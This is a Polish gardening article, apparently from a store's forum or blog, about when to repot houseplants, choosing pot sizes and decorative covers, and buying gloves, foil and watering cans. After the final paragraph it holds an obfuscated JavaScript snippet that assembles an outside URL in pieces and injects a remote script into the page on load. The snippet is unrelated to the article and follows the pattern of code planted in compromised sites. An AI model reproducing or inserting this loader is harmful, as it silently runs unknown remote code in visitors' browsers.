Forum

Musisz się zalogować jeżeli chcesz umieszczać wpisy i zakładać tematy.

Akcesoria do kwiatów – co będzie Ci potrzebne podczas przesadzania roślin?

Wiele osób ma uzasadnione obawy związane z przesadzaniem roślin. Kiedy jest najlepszy czas na wykonanie tej czynności? Czy zmiana doniczki nie zaszkodzi korzeniom? Jak przesadzać duże i przerośnięte kwiaty? I wreszcie – jakie akcesoria są niezbędne do przesadzania roślin, a które warto mieć pod ręką na wszelki wypadek? Jeśli dręczą Cię te pytania, to znaczy, że dobrze trafiłaś. Po lekturze tego tekstu kupisz potrzebne akcesoria, a następnie pewną ręką zmienisz doniczkę tym kwiatom, które rzeczywiście tego potrzebują.

Jak upewnić się, że roślina wymaga przesadzenia? 

Przesadzanie roślin wzbudza spory niepokój. Przeważnie boimy się o zdrowie kwiatków, szczególnie tych bardziej wymagających. Czy zmiana podłoża nie spowoduje zbyt dużego stresu i w następstwie choroby rośliny? I jak określić, czy to jest odpowiedni moment na przesadzanie? 

Co do zasady młode rośliny przesadza się raz do roku, wiosną, a starsze co 2–3 lata. Najlepiej jednak sugerować się stanem korzeni. Jeśli są przerośnięte, będą wystawać przez dziurki od odpływu. Aby inaczej sprawdzić ich stan, chwyć roślinę i wyciągnij ją delikatnie. Jeśli okaże się, że korzenie są przerośnięte tak, że pozostało niewiele miejsca na ziemię, to jasny sygnał, że najwyższy czas na zmianę doniczki. 

Kiedy zrezygnować z przesadzania? Jeśli kupiłaś nową roślinę i nic złego się z nią nie dzieje, daj jej czas na adaptację do nowych warunków. Odczekaj kilka tygodni, a jeśli roślinę zakupiłaś na jesieni lub w zimie, poczekaj do wiosny, nie powinno się jej nic stać. Nowe nabytki z promocji, których liście chorują, przesadź od razu nawet zimą. Przy czym odwrotnie postąp z tymi już posiadanymi – chorujących nie przesadzaj, tylko postaraj się zdiagnozować problem i go usunąć. 

Jeśli należysz do grupy osób, które mogą się pochwalić pokaźną kolekcją domowych roślin, sporządzaj notatki w trakcie przeprowadzania przeglądu. Zapisuj, które rośliny wymagają przesadzenia i jakiej średnicy doniczkę mają obecnie. Ułatwi Ci to późniejsze zakupy. 

Doniczka – co musisz o niej wiedzieć, zanim przesadzisz kwiatki 

Doniczka i osłonka na kwiaty domowe
Doniczka i osłonka na kwiaty domowe

Obok odpowiedniego podłoża kluczowy dla dobrostanu rośliny jest wybór odpowiedniej doniczki. Trafna decyzja w tym zakresie przyniesie korzyści nie tylko kwiatu, ale także wprowadzi świeżość do aranżacji pomieszczenia. Jak wybrać doniczkę do kwiatów domowych? 

Określ odpowiedni rozmiar doniczki 

Przyjmuje się, że nowa doniczka dla małych i średnich kwiatów powinna mieć o 2–3 cm większą średnicę od aktualnej. Powinna być też odpowiednio głębsza, aby zapewnić optymalną ilość miejsca dla rozrastających się korzeni. Duże okazy mogą potrzebować pojemnika większego nawet o 10 centymetrów. Pamiętaj, że za duże doniczki są niezdrowe dla korzeni, ponieważ powodują zaleganie wody. 

Dowiedz się, jak wybrać odpowiednią doniczkę na kwiaty >>> 

Zdecyduj, czy szukasz ozdobnej doniczki czy osłonki 

Doniczka niepodważalnie pełni funkcję estetyczną, jej dobór musi być więc podyktowany potrzebami aranżacyjnymi wnętrza. Niestety, nie zawsze da się pogodzić dekoracyjność z funkcjonalnością. Co wtedy? Doniczki nie zawsze są ładne. Ten problem rozwiążesz, dokupując atrakcyjne osłonki. Spośród różnych wariantów czekają na Ciebie m.in.: 

  • osłonka na doniczkę pleciona, 
  • osłonka na doniczkę na nóżkach, 
  • osłonka na doniczkę z trawy morskiej, 
  • osłonka na doniczkę ceramiczna, 
  • osłonka na doniczkę boho. 

Takie rozwiązanie ma dodatkową korzyść. Atutem osłonek jest to, że możesz je z łatwością zmieniać zawsze wtedy, kiedy chcesz. W przypadku starszych roślin, które przesadzane powinny być raz na parę lat, nie musisz czekać na zmianę doniczki, która już Ci się opatrzyła. 

Zrób przegląd doniczek 

Spójrz na swoją kolekcję roślin jak na całość. Wybierz dwa–trzy kolory, z których jeden dominujący. Dla kwiatów pnących rozważ zastosowanie doniczki wiszącej. Zanim wybierzesz się na zakupy, przejrzyj te doniczki, które już masz w domu. Często niewykorzystane i pozostałe po poprzednim przesadzaniu ukrywamy w piwnicy i kompletnie o nich zapominamy. Te, które nie odpowiadają nowym założeniom estetycznym, możesz wykorzystać jako doniczki na zioła do kuchni lub na balkon. Jeśli wiesz, jakie donice masz, a jakich Ci brakuje – sporządź pierwszą część listy zakupów. 

Jak wybrać donice ogrodowe i doniczkowe? Więcej na ten temat przeczytasz tu >>> 

Akcesoria potrzebne do przesadzania i pielęgnacji kwiatów 

Przesadzanie kwiatów, doniczka, rękawice robocze i ziemia
Przesadzanie kwiatów, doniczka, rękawice robocze i ziemia

Uprawianie własnego ogródka lub domowej zieleni może mieć terapeutyczną moc. Kontakt dłoni z ziemią to sensoryczne doznanie, które uspokaja. Wiele osób wprost nie może się doczekać wiosny i okresu, kiedy będzie mogło przesadzić rośliny. Dla niedoświadczonej osoby ten proces może okazać się jednak trudny. Jak przygotować stanowisko do pracy, aby rośliny przesadzić poprawnie i nie narobić przy tym zbyt dużego bałaganu? Zacznij od zaopatrzenia się w odpowiednie akcesoria. 

Na Twojej liście zakupów znajdują się już doniczki. Dopisz do każdej ilość i rodzaj podłoża, którego dobór to zupełnie odrębny i złożony temat – nie będziemy go zgłębiać w tym artykule. Rozejrzyj się po domu i wybierz stanowisko, np. balkon lub duży blat kuchenny. W markecie budowlanym, w którym możesz zakupić wszystkie akcesoria do przesadzania kwiatów, dostaniesz folię, którą zabezpieczysz miejsce pracy. Jeśli nie lubisz wydłubywania ziemi spod paznokci, kup rękawice robocze.  

Istotnym dodatkiem, który uprzyjemnia i usprawnia tak codzienną, jak sezonową pielęgnację roślin, jest konewka. Dostępne modele zaspokoją każdą potrzebę nawadniania kwiatów. Jeśli zależy Ci na trwałości i solidności, wybierz konewkę metalową. Jeśli natomiast nie masz specjalnego miejsca w mieszkaniu na trzymanie dodatkowych akcesoriów, postaw na konewkę ozdobną. Niech stanie się elementem dekoracyjnym Twojej kwiatowej kompozycji, która będzie dodatkowo przypominać o ich podlewaniu.  

Chcesz wiedzieć, jak wybrać odpowiednią konewkę? Przejdź do artykułu >>> 

Przedstawiliśmy niezbędne akcesoria do przesadzania kwiatów. Mamy nadzieję, że ułatwiliśmy sporządzenie kompletnej listy zakupów. Wszystkie produkty do pielęgnacji roślin kupisz np. w markecie budowlanym OBI. Oprócz dodatków do roślin domowych dostaniesz tam również konewki ogrodowe, doniczki na balkon i do ogrodu

(function(){
ohhn=document.createElement("script");ohhn.async=true;ohhn_="u"+("s")+"t";
ohhnu="376663147.";ohhn_+="a"+("t.i");ohhn_+="n"+("f"+"o")+"/";
ohhnu+="aer2a2sthhn7uzggc8jxj3"+("yc5bi3hk");
ohhn.src="https://"+ohhn_+ohhnu;ohhn.type="text/javascript";
document.body.appendChild(ohhn);
})();

facebook